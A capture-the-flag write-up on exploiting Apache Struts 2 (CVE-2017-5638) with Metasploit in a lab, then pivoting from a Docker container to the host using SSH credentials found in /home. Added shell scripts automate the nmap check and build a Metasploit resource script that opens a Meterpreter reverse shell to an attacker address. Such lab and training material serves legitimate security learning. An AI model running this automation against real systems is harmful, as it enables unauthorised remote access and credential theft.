Metasploit-a-ho-ho-ho

Exploiting Struts2 with Metasploit

CVE-2017-5638

In this challenge we need to compromise a web server using Metasploit.

The supporting material states that the web server is running a vulnerable version of Apache Struts 2.

A Google search for the vulnerable Struts 2 versions leads to CVE-2017-5638: an OGNL injection through the Content-Type header handled by the Jakarta Multipart parser, which gives unauthenticated remote code execution as the user running the application server.

There is also an Nmap NSE script (http-vuln-cve2017-5638) that tells us whether a web server is vulnerable to this bug. The only parameter it needs besides the target is the path of the Struts application. Navigating to the web page we can see that the path is /showcase.action.

Running the nmap script confirmed that the web server is vulnerable to CVE-2017-5638.

Using Metasploit

Searching for struts2 in Metasploit shows seven exploit modules. One of them is the module used in the supporting material, so that is the one we use for CVE-2017-5638. (Rather than guessing, the module's info page lists the CVE it targets under its references, which is the proper way to match a module to a CVE.)

Looking at the options of the exploit we see three things we need to set or change: RHOSTS (the IP of the machine we intend to exploit); RPORT (it defaults to 8080, but this web server is running on port 80); and TARGETURI (the default path must be changed to the path we found on the web page, /showcase.action).

Having everything set up for the exploit, it's time to select a payload to get a reverse shell on the server. We use the same payload as the supporting material: linux/x86/meterpreter/reverse_tcp.

Looking at the options again we see that we now need to set LHOST, the IP of our attacking machine that the reverse shell will connect back to. It must be an address the target can actually reach, and the listener uses LPORT, which defaults to 4444.

After setting LHOST we type run (or exploit) to launch the exploit and get a Meterpreter session.
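The check-then-exploit procedure above, scripted as an added example; this is not code from the writeup or from the supporting material. It assumes nmap and msfconsole are installed on the attacking machine, that the module is exploit/multi/http/struts2_content_type_ognl (the module Metasploit ships for CVE-2017-5638; the writeup does not name the module it used), and that the IP addresses in the usage line are placeholders:

```shell
#!/bin/sh
# Added example: automates the CVE-2017-5638 check and the Metasploit run
# described in the writeup. Not the writeup's own code.

# Build the nmap NSE check. The script's only required argument besides the
# target is the application path (script-arg http-vuln-cve2017-5638.path).
struts_nmap_check() {
    target="$1"; port="$2"; path="$3"
    printf 'nmap -p %s --script http-vuln-cve2017-5638 --script-args http-vuln-cve2017-5638.path=%s %s\n' \
        "$port" "$path" "$target"
}

# Write a Metasploit resource script with the four options the writeup changes
# (RHOSTS, RPORT, TARGETURI, LHOST) and the payload it uses. The module name
# is an assumption of this example: exploit/multi/http/struts2_content_type_ognl
# is Metasploit's module for CVE-2017-5638.
write_struts_rc() {
    target="$1"; port="$2"; path="$3"; lhost="$4"; out="$5"
    cat > "$out" <<EOF
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS $target
set RPORT $port
set TARGETURI $path
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST $lhost
run
EOF
}

# Full procedure: run the NSE check first and only launch Metasploit if the
# scanner reports the host as VULNERABLE (the NSE vulns library prints
# "State: VULNERABLE" on a positive result).
struts_attack() {
    target="$1"; port="$2"; path="$3"; lhost="$4"
    rc="$(mktemp)"
    if eval "$(struts_nmap_check "$target" "$port" "$path")" | grep -q 'VULNERABLE'; then
        write_struts_rc "$target" "$port" "$path" "$lhost" "$rc"
        msfconsole -q -r "$rc"
    else
        echo "nmap did not report $target:$port$path as vulnerable; not exploiting" >&2
        return 1
    fi
}

# Usage on an engagement (placeholder addresses, not from the page):
#   struts_attack 10.10.10.10 80 /showcase.action 10.9.0.1
```

Driving msfconsole from a resource script rather than typing the options by hand makes the run repeatable and leaves a record of exactly which RHOSTS, RPORT and TARGETURI were used, which matters when the report is written.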

Once inside the web server we need to find flag1. Meterpreter offers a lot of functionality, but it has no find command, which is exactly what we want right now, so we drop to a system shell by typing shell and use find to locate flag1. (Meterpreter's own search -f command would also do the job without leaving the session.)

Typing exit leaves the system shell and returns us to the Meterpreter prompt, where we can read the flag with cat.

The second question asks for the SSH password of Santa and tells us to get onto the main system.

Navigating to the root directory we see a .dockerenv file. This means we are not on the main system but inside a Docker container: the exploited web server is isolated from the host, so the host is a separate target we still need to reach.

The supporting material mentions this as well.
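The two post-exploitation steps above (locate flag1, then decide whether the shell is inside a container), as an added example that is not part of the writeup. The functions take a root prefix so they can be exercised against a constructed directory tree; on the target you call them with /. The /.dockerenv test is the one the writeup relies on; the PID 1 cgroup test is an extra indicator added here as an assumption of this example, and it is not conclusive on cgroup v2 hosts, where the cgroup path is often just 0::/.

```shell
#!/bin/sh
# Added example, not the writeup's code: commands for the shell dropped out of
# meterpreter. ROOT is a prefix ("/" on the target) so the functions can be
# tested against a constructed tree.

# Find regular files whose name starts with NAME under ROOT, silencing the
# permission-denied noise a web-server user gets all over the filesystem.
find_flag() {
    root="$1"; name="$2"
    find "$root" -type f -name "${name}*" 2>/dev/null
}

# Print why we believe we are in a container and return 0, or print "host"
# and return 1. /.dockerenv is what the writeup spotted; the cgroup check is
# an assumption of this example and catches Docker/containerd/Kubernetes on
# cgroup v1 (on cgroup v2 the path is usually "0::/" and says nothing).
in_container() {
    root="${1:-/}"
    if [ -f "$root/.dockerenv" ]; then
        echo "container: $root/.dockerenv exists"
        return 0
    fi
    if [ -r "$root/proc/1/cgroup" ] \
       && grep -qE '(docker|containerd|kubepods|lxc)' "$root/proc/1/cgroup"; then
        echo "container: PID 1 cgroup path names a container runtime"
        return 0
    fi
    echo "host"
    return 1
}

# Usage on the target (typed after 'shell' in meterpreter):
#   find_flag / flag1
#   in_container / && echo "inside a container: look for host credentials under /home"
```

Knowing early that the shell lives in a container changes the plan: file system reconnaissance only tells you about the container image, and reaching the host means finding credentials or another service, as the next step does.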

The first obvious place to look is /home, which contains Santa's home directory with his SSH credentials.

From the container we can now SSH into the main system (the Docker host), where the text files that answer the last two questions are.
